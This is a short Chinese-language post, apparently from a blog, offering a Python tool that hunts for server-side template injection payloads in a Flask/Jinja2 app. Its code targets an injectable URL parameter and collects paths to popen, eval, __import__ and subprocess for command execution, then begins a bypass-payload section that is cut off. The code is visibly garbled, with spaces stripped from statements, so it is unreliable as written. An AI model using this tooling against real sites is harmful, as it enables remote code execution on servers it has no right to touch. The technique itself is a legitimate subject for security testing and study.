抛开代码丑不谈，用起来还是挺好用滴。 fromflaskimportFlask,request fromjinja2importTemplate fromthreadingimportThread importrequests importos 写入需注入的站点和url参数 site="http://127.0.0.1:5000/waewe?404_url=" url存储字典 url_dict={ "popen":[], "eval":[], "__import__":[], "subprocess":[], } 通用[Python2、3]及绕过payload currency_u...